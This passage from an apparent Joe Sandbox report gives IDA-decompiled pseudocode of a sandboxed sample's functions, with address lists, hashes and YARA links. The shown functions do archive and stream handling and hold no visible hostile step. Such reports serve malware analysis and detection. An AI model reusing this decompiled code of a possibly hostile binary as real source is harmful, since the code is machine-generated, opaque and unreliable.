					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
					 *(_t284 - 4) = 0xa;
					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
					if(_t202 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
						_t271 =  *(_t284 - 0x1c);
						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
						_t270 =  *((intOrPtr*)(_t284 + 0x10));
						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
							E0040DB47(_t270);
						}
					}
					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t284 - 4) = 8;
						if(_t283 != 0) {
							 *((intOrPtr*)( *_t283 + 8))(_t283);
						}
						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t271 =  *(_t284 - 0x50);
							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
							_t227 = _t227 + _t267;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
							asm("adc [edi+0x4c], eax");
							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t283;
				 *(_t284 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t283 + 8))(_t283);
				}
				 *(_t284 - 4) = 7;
				E0040C380(_t284 - 0x164, __eflags);
				 *(_t284 - 4) = 6;
				E004042AD(_t284 - 0x70);
				 *(_t284 - 4) = 5;
				E004042AD(_t284 - 0xb0);
				 *(_t284 - 4) = 4;
				E004042AD(_t284 - 0x9c);
				 *(_t284 - 4) = 3;
				E004042AD(_t284 - 0x84);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				_t279 =  *((intOrPtr*)(_t284 - 0x48));
				 *(_t284 - 4) = 0xb;
				goto L18;
			}
















                              0x0040ea0b
                              0x0040ea0b
                              0x0040ea10
                              0x0040ea1e
                              0x0040ea25
                              0x0040ea2a
                              0x0040ea31
                              0x0040ea3d
                              0x0040ea47
                              0x0040ea55
                              0x0040ea5f
                              0x0040ea68
                              0x0040ea6c
                              0x0040ea71
                              0x0040ea80
                              0x0040ea85
                              0x0040ea93
                              0x0040ea98
                              0x0040eaaa
                              0x0040eaaf
                              0x0040eaba
                              0x0040eabf
                              0x0040eac5
                              0x0040eaf9
                              0x0040eafd
                              0x0040eb02
                              0x0040eb0e
                              0x0040eb18
                              0x0040eb1b
                              0x0040eb1e
                              0x0040eb26
                              0x0040eb29
                              0x0040ec89
                              0x0040ec8f
                              0x0040ec93
                              0x0040ec9b
                              0x0040ec9f
                              0x0040ecaa
                              0x0040ecae
                              0x0040ecb9
                              0x0040ecbd
                              0x0040ecc8
                              0x0040eccc
                              0x0040ecd1
                              0x0040ecd8
                              0x0040ecdc
                              0x0040ecde
                              0x0040ece1
                              0x0040ece9
                              0x0040eced
                              0x0040ecf8
                              0x0040ecfc
                              0x0040ed01
                              0x0040ed0b
                              0x0040ed10
                              0x0040ed17
                              0x0040ed24
                              0x0040ed2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040eb2f
                              0x0040eb2f
                              0x0040eb35
                              0x0040eb39
                              0x0040eb45
                              0x0040eb48
                              0x0040eb51
                              0x0040eb52
                              0x0040eb56
                              0x0040eb5e
                              0x0040eb62
                              0x0040eb65
                              0x0040eb6a
                              0x0040eb74
                              0x0040eb7b
                              0x0040eb83
                              0x0040eb88
                              0x0040eb8d
                              0x0040eb93
                              0x0040eb93
                              0x0040eb9d
                              0x0040eba2
                              0x0040eba4
                              0x0040eba9
                              0x0040ebae
                              0x0040ebb0
                              0x0040ebb3
                              0x0040ebb9
                              0x0040ebb9
                              0x0040ebbb
                              0x0040ebbd
                              0x0040ebc3
                              0x0040ebc8
                              0x0040ebc8
                              0x0040ebce
                              0x0040ebd7
                              0x0040ebde
                              0x0040ebe4
                              0x0040ebe8
                              0x0040ebff
                              0x0040ec06
                              0x0040ec09
                              0x00000000
                              0x00000000
                              0x0040ec16
                              0x0040ec1b
                              0x0040ec21
                              0x0040ec26
                              0x0040ec2c
                              0x0040ec2e
                              0x0040ec2e
                              0x0040ec2c
                              0x0040ec36
                              0x0040ec3e
                              0x0040ec6c
                              0x0040ec6e
                              0x0040ec72
                              0x0040ec77
                              0x0040ec77
                              0x0040ec7a
                              0x0040ec80
                              0x0040ec83
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040ec40
                              0x0040ec40
                              0x0040ec43
                              0x0040ec49
                              0x0040ec4c
                              0x0040ec53
                              0x0040ec55
                              0x0040ec58
                              0x0040ec5b
                              0x0040ec5e
                              0x0040ec67
                              0x00000000
                              0x0040ec40
                              0x0040ec3e
                              0x0040ed2f
                              0x0040ed31
                              0x0040ed35
                              0x0040ed3a
                              0x0040ed3a
                              0x0040ed43
                              0x0040ed47
                              0x0040ed4f
                              0x0040ed53
                              0x0040ed5e
                              0x0040ed62
                              0x0040ed6d
                              0x0040ed71
                              0x0040ed7c
                              0x0040ed80
                              0x0040ed85
                              0x0040ed8c
                              0x0040ed8f
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040EA10
                                • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                              • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F648 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0040F648(intOrPtr* __ecx, void* __eflags) {
				char* _t92;
				signed char _t103;
				intOrPtr* _t104;
				signed char _t106;
				void* _t112;
				void* _t116;
				signed char _t120;
				void* _t124;
				signed int _t137;
				intOrPtr* _t144;
				void* _t145;
				void* _t164;
				signed char _t168;
				intOrPtr _t170;
				intOrPtr* _t173;
				signed char _t175;
				void* _t176;

				E00413954(E0041A7FC, _t176);
				_t170 =  *((intOrPtr*)(_t176 + 8));
				_t173 = __ecx;
				E0040D377(_t170);
				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
				_t92 = _t170 + 0x130;
				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
				if( *_t92 != 0) {
					E0040DB47(_t143);
				}
				_t144 = _t173 + 0x34;
				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
				_t137 =  *(_t173 + 0x40);
				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
				_t164 = 0x14;
				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
					E0040DB47(_t144);
				}
				_t145 = 0;
				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
				asm("adc edx, ecx");
				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
				if(( *(_t176 - 0x20) | _t137) != 0) {
					__eflags = _t137 - _t145;
					if(_t137 > _t145) {
						L11:
						_t103 = 1;
					} else {
						__eflags =  *(_t176 - 0x20) - 0xffffffff;
						if( *(_t176 - 0x20) > 0xffffffff) {
							goto L11;
						} else {
							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
							if(__eflags > 0) {
								L12:
								_t104 =  *_t173;
								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
								__eflags = _t103;
								if(_t103 == 0) {
									 *((intOrPtr*)(_t176 - 0x30)) = 0;
									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									 *(_t176 - 4) = 0;
									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
									__eflags = _t106;
									if(_t106 == 0) {
										_t168 =  *(_t176 - 0x20);
										asm("adc ecx, 0x0");
										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
										asm("adc [esi+0x4c], ecx");
										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
										asm("adc ebx, [ebp-0x14]");
										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
										asm("adc ebx, 0x0");
										 *(_t170 + 0x1cc) = _t137;
										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
											E0040DB47(_t151);
										}
										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
										 *(_t176 - 4) = 1;
										E0040DAE2(_t173, _t176 - 0x34);
										E004032A8(_t176 - 0x48, 4);
										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
										_t154 =  *((intOrPtr*)(_t173 + 0x18));
										 *(_t176 - 4) = 2;
										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
										__eflags = _t116 - 1;
										if(_t116 != 1) {
											L19:
											__eflags = _t116 - 0x17;
											if(_t116 != 0x17) {
												L21:
												E0040DB47(_t154);
											} else {
												__eflags = _t168;
												if(__eflags != 0) {
													goto L21;
												}
											}
											_t155 = _t173;
											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
											__eflags = _t120;
											if(_t120 == 0) {
												__eflags =  *(_t176 - 0x40);
												if( *(_t176 - 0x40) != 0) {
													__eflags =  *(_t176 - 0x40) - 1;
													if( *(_t176 - 0x40) > 1) {
														E0040DB47(_t155);
													}
													E0040DA34(_t176 - 0x28);
													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
													_t158 =  *((intOrPtr*)(_t173 + 0x18));
													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
													__eflags = _t124 - 1;
													if(_t124 != 1) {
														L30:
														E0040DB47(_t158);
													} else {
														__eflags = _t168;
														if(_t168 != 0) {
															goto L30;
														}
													}
													goto L31;
												} else {
													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
													 *(_t176 - 4) = 4;
													_t175 = 0;
												}
											} else {
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 3;
												goto L32;
											}
										} else {
											__eflags = _t168;
											if(_t168 == 0) {
												L31:
												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
												_t120 = E0040ED98(_t173, _t168, _t170);
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 5;
												L32:
												_t175 = _t120;
											} else {
												goto L19;
											}
										}
										E004042D6();
										 *(_t176 - 4) = 1;
										E004042AD(_t176 - 0x48);
										_t81 = _t176 - 4;
										 *_t81 =  *(_t176 - 4) & 0x00000000;
										__eflags =  *_t81;
										E0040DA34(_t176 - 0x28);
									} else {
										_t175 = _t106;
									}
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
									_t103 = _t175;
								}
							} else {
								if(__eflags < 0) {
									goto L11;
								} else {
									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t103 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
				return _t103;
			}




















                              0x0040f64d
                              0x0040f658
                              0x0040f65b
                              0x0040f65f
                              0x0040f667
                              0x0040f670
                              0x0040f679
                              0x0040f67f
                              0x0040f681
                              0x0040f687
                              0x0040f68d
                              0x0040f68f
                              0x0040f68f
                              0x0040f697
                              0x0040f69a
                              0x0040f69d
                              0x0040f6a4
                              0x0040f6aa
                              0x0040f6b0
                              0x0040f6b6
                              0x0040f6b7
                              0x0040f6c2
                              0x0040f6c4
                              0x0040f6c4
                              0x0040f6d4
                              0x0040f6d5
                              0x0040f6de
                              0x0040f6e2
                              0x0040f6e8
                              0x0040f6f1
                              0x0040f6f3
                              0x0040f707
                              0x0040f709
                              0x0040f6f5
                              0x0040f6f5
                              0x0040f6f9
                              0x00000000
                              0x0040f6fb
                              0x0040f6fb
                              0x0040f6fe
                              0x0040f70f
                              0x0040f70f
                              0x0040f71d
                              0x0040f722
                              0x0040f724
                              0x0040f72a
                              0x0040f72d
                              0x0040f730
                              0x0040f73a
                              0x0040f740
                              0x0040f74d
                              0x0040f752
                              0x0040f754
                              0x0040f75d
                              0x0040f767
                              0x0040f76a
                              0x0040f76f
                              0x0040f775
                              0x0040f778
                              0x0040f77e
                              0x0040f784
                              0x0040f787
                              0x0040f78d
                              0x0040f792
                              0x0040f795
                              0x0040f797
                              0x0040f797
                              0x0040f79c
                              0x0040f7a8
                              0x0040f7ac
                              0x0040f7b6
                              0x0040f7c0
                              0x0040f7c3
                              0x0040f7c6
                              0x0040f7ca
                              0x0040f7cf
                              0x0040f7d2
                              0x0040f7dc
                              0x0040f7dc
                              0x0040f7df
                              0x0040f7e5
                              0x0040f7e5
                              0x0040f7e1
                              0x0040f7e1
                              0x0040f7e3
                              0x00000000
                              0x00000000
                              0x0040f7e3
                              0x0040f7ed
                              0x0040f803
                              0x0040f808
                              0x0040f80a
                              0x0040f815
                              0x0040f819
                              0x0040f826
                              0x0040f82a
                              0x0040f82c
                              0x0040f82c
                              0x0040f834
                              0x0040f842
                              0x0040f847
                              0x0040f84a
                              0x0040f84f
                              0x0040f852
                              0x0040f858
                              0x0040f858
                              0x0040f854
                              0x0040f854
                              0x0040f856
                              0x00000000
                              0x00000000
                              0x0040f856
                              0x00000000
                              0x0040f81b
                              0x0040f81b
                              0x0040f81e
                              0x0040f822
                              0x0040f822
                              0x0040f80c
                              0x0040f80c
                              0x0040f80f
                              0x00000000
                              0x0040f80f
                              0x0040f7d4
                              0x0040f7d4
                              0x0040f7d6
                              0x0040f85d
                              0x0040f861
                              0x0040f86c
                              0x0040f872
                              0x0040f877
                              0x0040f87a
                              0x0040f87e
                              0x0040f87e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040f7d6
                              0x0040f883
                              0x0040f88b
                              0x0040f88f
                              0x0040f894
                              0x0040f894
                              0x0040f894
                              0x0040f89b
                              0x0040f756
                              0x0040f756
                              0x0040f756
                              0x0040f8a3
                              0x0040f8aa
                              0x0040f8b0
                              0x0040f8b0
                              0x0040f700
                              0x0040f700
                              0x00000000
                              0x0040f702
                              0x0040f702
                              0x0040f705
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040f705
                              0x0040f700
                              0x0040f6fe
                              0x0040f6f9
                              0x0040f6ea
                              0x0040f6ea
                              0x0040f6ea
                              0x0040f8b8
                              0x0040f8c0

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                              • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C783 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040C783(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				E00413954(E0041A330, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                              0x0040c788
                              0x0040c792
                              0x0040c79a
                              0x0040c7a3
                              0x0040c7b2
                              0x0040c7a5
                              0x0040c7ad
                              0x0040c7ad
                              0x0040c7b9
                              0x0040c7c5
                              0x0040c7c7
                              0x0040c7ce
                              0x0040c7d7
                              0x0040c7dc
                              0x0040c7df
                              0x0040c803
                              0x0040c808
                              0x0040c80e
                              0x0040c812
                              0x0040c815
                              0x0040c818
                              0x0040c81b
                              0x0040c81e
                              0x0040c828
                              0x0040c82d
                              0x0040c833
                              0x0040c836
                              0x0040c855
                              0x0040c855
                              0x0040c85c
                              0x0040c865
                              0x0040c868
                              0x0040c86c
                              0x0040c86e
                              0x0040c873
                              0x0040c878
                              0x0040c878
                              0x0040c87b
                              0x0040c7e1
                              0x0040c7e1
                              0x0040c7e4
                              0x0040c7ea
                              0x0040c7ef
                              0x0040c7ef
                              0x0040c7f2
                              0x0040c7f2
                              0x0040c883
                              0x0040c88b

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                              • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D1AB Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0040D1AB() {
				intOrPtr* _t44;
				intOrPtr _t50;
				void* _t61;
				intOrPtr* _t62;
				void* _t75;
				intOrPtr _t76;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;

				E00413954(E0041A550, _t82);
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t82 + 8));
				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
				_t80 =  *((intOrPtr*)(_t82 + 0x14));
				 *(_t82 - 4) = 1;
				_t87 = _t80;
				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
				if(_t80 != 0) {
					 *((intOrPtr*)( *_t80 + 4))(_t80);
				}
				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
				 *(_t82 - 4) = 3;
				E00402155(_t82 - 0x60);
				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
				_push( *((intOrPtr*)(_t82 + 0x10)));
				 *(_t82 - 4) = 4;
				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
				_t88 = _t76;
				if(_t76 == 0) {
					_t77 = _t62 + 0x10;
					_push(_t62 + 0x10); // executed
					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
					__eflags = _t44;
					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
					if(__eflags == 0) {
						E0040F4D8(_t77);
						E0040F51A();
						E0040F56F(_t77);
						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 = 0;
					} else {
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 =  *((intOrPtr*)(_t82 + 0x14));
					}
				} else {
					 *(_t82 - 4) = 2;
					E0040D2CF(_t82 - 0x64, _t88);
					 *(_t82 - 4) = 1;
					if(_t80 != 0) {
						 *((intOrPtr*)( *_t80 + 8))(_t80);
					}
					_t50 = _t76;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
				return _t50;
			}













                              0x0040d1b0
                              0x0040d1b8
                              0x0040d1bd
                              0x0040d1c4
                              0x0040d1c8
                              0x0040d1cb
                              0x0040d1ce
                              0x0040d1d2
                              0x0040d1d4
                              0x0040d1d7
                              0x0040d1dc
                              0x0040d1dc
                              0x0040d1df
                              0x0040d1e6
                              0x0040d1ea
                              0x0040d1ef
                              0x0040d1f6
                              0x0040d1fc
                              0x0040d208
                              0x0040d20a
                              0x0040d20c
                              0x0040d22f
                              0x0040d235
                              0x0040d236
                              0x0040d23b
                              0x0040d23d
                              0x0040d240
                              0x0040d263
                              0x0040d26a
                              0x0040d271
                              0x0040d27c
                              0x0040d284
                              0x0040d288
                              0x0040d28d
                              0x0040d28f
                              0x0040d293
                              0x0040d298
                              0x0040d298
                              0x0040d29b
                              0x0040d242
                              0x0040d245
                              0x0040d249
                              0x0040d24e
                              0x0040d250
                              0x0040d254
                              0x0040d259
                              0x0040d259
                              0x0040d25c
                              0x0040d25c
                              0x0040d20e
                              0x0040d211
                              0x0040d215
                              0x0040d21c
                              0x0040d220
                              0x0040d225
                              0x0040d225
                              0x0040d228
                              0x0040d228
                              0x0040d2c3
                              0x0040d2cc

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040D1B0
                                • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
